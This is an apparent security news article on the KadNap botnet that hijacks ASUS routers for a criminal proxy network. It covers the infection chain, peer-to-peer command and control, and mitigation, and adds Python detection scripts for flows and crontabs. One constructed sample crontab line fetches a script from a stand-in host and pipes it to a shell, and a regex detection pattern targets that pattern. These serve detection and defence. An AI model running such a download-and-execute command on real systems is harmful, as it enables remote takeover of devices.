PROBABLYPWNED
Malware | April 5, 2026 | 4 min read

KadNap Botnet Hijacks 14,000+ ASUS Routers for Proxy Network

Security researchers expose KadNap malware targeting ASUS routers to build a criminal proxy network. 60% of infected devices located in the US, linked to Doppelganger service.

James Rivera

A botnet called KadNap has compromised over 14,000 ASUS routers and edge networking devices since August 2025, turning them into a proxy network that cybercriminals rent for DDoS attacks, credential stuffing, and traffic obfuscation. Lumen Technologies researchers tracked the operation and have begun blocking all traffic to the botnet's control infrastructure.

How KadNap Infects Routers

The infection begins with a shell script named "aic.sh" downloaded from the command server. This script creates a cron job that runs every 55 minutes, retrieving updates and maintaining persistence across router reboots. The script renames itself to ".asusrouter"—a hidden file that blends with legitimate ASUS configuration files.

Once persistence is established, the script downloads an ELF binary named "kad" that installs the botnet client. The malware is built for both ARM and MIPS processors, covering the majority of consumer and small business networking equipment.

After installation, KadNap determines the host's external IP address and contacts NTP servers to synchronize timing data. This timing coordination suggests the botnet operators need precise scheduling across their proxy network, likely for coordinated attacks or to avoid detection through behavioral analysis.

Kademlia DHT: Hiding in Plain Sight

KadNap's most notable feature is its use of a custom Kademlia Distributed Hash Table protocol for command and control. Rather than pointing infected devices at a single server that defenders could block, the malware distributes C2 information across a peer-to-peer network.

This makes traditional domain or IP-based blocking largely ineffective. Infected routers discover new C2 nodes through the DHT, and the infrastructure can shift without pushing updates to every bot. We've seen similar P2P C2 techniques used by North Korean actors targeting FortiGate devices, suggesting the approach is gaining popularity among sophisticated threat actors.

However, Lumen researchers found a weakness: KadNap consistently connects to two specific nodes before reaching the actual C2 infrastructure. This architectural shortcut reduces the decentralization benefits and gives defenders a chokepoint for detection and blocking.
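Detection logic for the chokepoint just described, as an added example that is not Lumen's or this article's code: it reads a simple flow export and flags any internal host that contacts both bootstrap nodes and then goes on to reach other peers on high UDP ports. The two bootstrap addresses are placeholders from the documentation ranges, because the real indicators are not on this page; the flow lines and their one-line format are constructed for the example.

```python
"""Flag hosts whose outbound flows show the bootstrap-then-peers pattern.

Added example. BOOTSTRAP_NODES are placeholders (TEST-NET-3 addresses), not
real indicators; substitute the published IoCs. Flow lines are constructed:
"<timestamp> <src> <dst> <dport> <proto>".
"""
import ipaddress
from collections import defaultdict

# Assumption: replace with the two bootstrap node addresses from published IoCs.
BOOTSTRAP_NODES = {"203.0.113.10", "203.0.113.20"}

# Ports below this are treated as ordinary service traffic (e.g. NTP on 123).
HIGH_PORT_FLOOR = 1024

# RFC 1918 ranges; anything else is treated as "public" so the documentation
# ranges used in the constructed sample count as external peers.
LOCAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample export (not captured traffic).
SAMPLE_FLOWS = """
2026-04-01T10:00:01 192.168.1.1 203.0.113.10 6881 udp
2026-04-01T10:00:02 192.168.1.1 203.0.113.20 6881 udp
2026-04-01T10:00:05 192.168.1.1 198.51.100.7 41234 udp
2026-04-01T10:00:06 192.168.1.1 198.51.100.9 123 udp
2026-04-01T10:00:09 192.168.1.1 198.51.100.12 50123 udp
2026-04-01T10:01:00 192.168.1.50 198.51.100.30 443 tcp
2026-04-01T10:02:00 192.168.1.50 203.0.113.10 6881 udp
2026-04-01T10:03:00 192.168.1.77 198.51.100.30 443 tcp
"""


def is_local(ip):
    """True for RFC 1918 addresses (internal hosts), False otherwise."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LOCAL_NETS)


def parse_flows(text):
    """Yield (timestamp, src, dst, dport, proto) tuples from flow lines."""
    for line in text.strip().splitlines():
        ts, src, dst, dport, proto = line.split()
        yield ts, src, dst, int(dport), proto


def analyze(text):
    """Return {src_ip: verdict} for every host that touched a bootstrap node.

    "high":   both bootstrap nodes contacted, followed by 2+ public peers on
              high UDP ports (the bootstrap-then-peers sequence)
    "medium": bootstrap contact without the follow-on peer traffic
    Hosts that never touch a bootstrap node are omitted.
    """
    state = defaultdict(lambda: {"bootstrap": set(), "peers": set()})
    for ts, src, dst, dport, proto in sorted(parse_flows(text)):
        host = state[src]
        if dst in BOOTSTRAP_NODES:
            host["bootstrap"].add(dst)
        elif host["bootstrap"] and proto == "udp" and dport >= HIGH_PORT_FLOOR and not is_local(dst):
            # Only peers reached after the first bootstrap contact count.
            host["peers"].add(dst)

    verdicts = {}
    for src, host in state.items():
        if not host["bootstrap"]:
            continue
        if host["bootstrap"] == BOOTSTRAP_NODES and len(host["peers"]) >= 2:
            verdicts[src] = "high"
        else:
            verdicts[src] = "medium"
    return verdicts


if __name__ == "__main__":
    for src, verdict in analyze(SAMPLE_FLOWS).items():
        print(f"{src}: {verdict}")
```

The ordering matters: peers are only counted once a bootstrap node has been seen, which is what distinguishes this pattern from a host that merely happens to use high UDP ports. A host that touches a bootstrap node without the follow-on traffic is still reported at medium confidence, since the bootstrap contact alone is the chokepoint worth alerting on.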

The Doppelganger Connection

The KadNap botnet feeds into the Doppelganger proxy service, believed to be a rebrand of the defunct Faceless service previously linked to the TheMoon malware operation. Doppelganger sells access to infected devices as "residential proxies"—IP addresses that appear to originate from legitimate home internet connections rather than known data centers or VPN providers.

These residential proxies command premium prices because they:

  • Evade IP-based blocking and rate limiting
  • Bypass geographic restrictions
  • Obscure the true source of attacks
  • Make credential stuffing and account takeover more effective

Cybercriminals using Doppelganger can route their traffic through thousands of compromised home routers, making attribution and blocking extremely difficult for target organizations.

Geographic Distribution

The infection pattern isn't random. Sixty percent of compromised devices are located in the United States, with significant clusters in Taiwan, Hong Kong, and Russia. The US concentration likely reflects both the popularity of ASUS routers in the American market and the premium value of US-based residential IP addresses for bypassing American services.

This geographic targeting echoes patterns we've covered in threat intelligence reports showing US credentials and access selling at higher prices on dark web marketplaces. American IP addresses simply open more doors.

Why This Matters

Router botnets represent a persistent blind spot in enterprise security. Organizations focus on endpoint detection, email filtering, and network segmentation while traffic from employee home routers—now often part of corporate network paths thanks to remote work—goes largely unmonitored.

A compromised home router can:

  • Intercept unencrypted traffic
  • Redirect DNS queries
  • Serve as a pivot point into corporate VPNs
  • Generate malicious traffic that appears to originate from legitimate employees

The 14,000+ device count makes KadNap mid-sized by botnet standards, but the residential proxy angle amplifies its impact. Each infected router potentially facilitates hundreds of attacks against other organizations.

Mitigation Steps

Lumen Technologies is blocking KadNap traffic across its network and plans to publish indicators of compromise publicly. For ASUS router owners:

  1. Update firmware immediately - Check the ASUS support site for your model
  2. Disable remote management - Unless absolutely necessary for your use case
  3. Check for unusual cron jobs - Look for hidden files in system directories
  4. Monitor outbound traffic - Unexpected connections to non-standard ports may indicate compromise
  5. Consider router replacement - Older models no longer receiving updates should be retired
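The following added example (not the article's or Lumen's code) turns step 3 and the infection description above into a check: it scans the text of `crontab -l` and `ls -la` collected from a router and looks for the 55-minute cron entry, the hidden ".asusrouter" script, the "kad" binary, and the name-independent download-and-run pattern. The sample output is constructed, the host `c2.invalid` is a placeholder, and the assumption that the device exposes these commands over SSH is mine. Name matches are indicators, not proof: a rebuilt variant can rename its files, so the schedule and download-and-execute checks are kept as signals that do not depend on names.

```python
"""Scan collected router output for the persistence artifacts described above.

Added example. Inputs are assumed to be the text of `crontab -l` and `ls -la`
gathered from the router; the samples below are constructed.
"""
import re

# File names reported for KadNap in the article.
REPORTED_NAMES = ("aic.sh", ".asusrouter", "kad")

CRON_FIELDS = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")
DOWNLOAD_AND_RUN = re.compile(r"\b(wget|curl)\b.*\|\s*(sh|bash|ash)\b")

SAMPLE_CRONTAB = """\
# constructed sample of `crontab -l` on a router
0 3 * * * /sbin/logrotate
*/55 * * * * /tmp/.asusrouter >/dev/null 2>&1
*/10 * * * * wget -q -O - http://c2.invalid/update.sh | sh
"""

SAMPLE_LS = """\
drwxrwxrwt    3 admin admin   4096 Apr  1 10:00 .
drwxr-xr-x   14 admin admin   4096 Mar 30 09:12 ..
-rwxr-xr-x    1 admin admin  53248 Apr  1 10:00 .asusrouter
-rwxr-xr-x    1 admin admin 241664 Apr  1 10:00 kad
-rw-r--r--    1 admin admin    128 Apr  1 09:58 dhcp.leases
"""


def _mentions_reported_name(text):
    """True if a reported file name appears as a whole path component."""
    return any(re.search(r"(^|/)" + re.escape(n) + r"(\s|$)", text) for n in REPORTED_NAMES)


def cron_findings(crontab_text):
    """Return [(line_number, command, [reasons])] for suspicious cron entries."""
    findings = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_FIELDS.match(line)
        if not m:
            continue
        minute, command = m.group(1), m.group(6).strip()
        reasons = []
        # "*/55" is the usual way a 55-minute step is written in the minute field.
        if minute == "*/55":
            reasons.append("55-minute schedule matches the reported KadNap cron job")
        if _mentions_reported_name(command):
            reasons.append("command references a reported KadNap file name")
        if DOWNLOAD_AND_RUN.search(command):
            reasons.append("command downloads remote content and pipes it to a shell")
        if reasons:
            findings.append((lineno, command, reasons))
    return findings


def file_findings(ls_text):
    """Return [(name, [reasons])] for suspicious entries in `ls -la` output."""
    findings = []
    for line in ls_text.splitlines():
        parts = line.split()
        if len(parts) < 9 or parts[0][0] not in "-dl":
            continue
        perms, name = parts[0], parts[-1]
        if name in (".", ".."):
            continue
        reasons = []
        if _mentions_reported_name(name):
            reasons.append("name matches a reported KadNap artifact")
        if name.startswith(".") and perms[0] == "-" and "x" in perms:
            reasons.append("hidden regular file with the execute bit set")
        if reasons:
            findings.append((name, reasons))
    return findings


def triage(crontab_text, ls_text):
    """Overall verdict: 'likely infected', 'suspicious' or 'clean'."""
    cron = cron_findings(crontab_text)
    files = file_findings(ls_text)
    named = any("reported KadNap" in r for _, _, rs in cron for r in rs) or \
        any("reported KadNap" in r for _, rs in files for r in rs)
    if named:
        return "likely infected"
    if cron or files:
        return "suspicious"
    return "clean"


if __name__ == "__main__":
    print(triage(SAMPLE_CRONTAB, SAMPLE_LS))
```

Run it against output gathered from the router rather than from a workstation; the paths in the sample are only illustrative, and a clean crontab that still contains a download-and-run entry is reported as "suspicious" so it gets looked at even when none of the reported names are present.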

Enterprise security teams should assume some percentage of remote workers have compromised home network equipment. Zero trust architectures that don't implicitly trust traffic based on source IP become more important as router botnets proliferate.
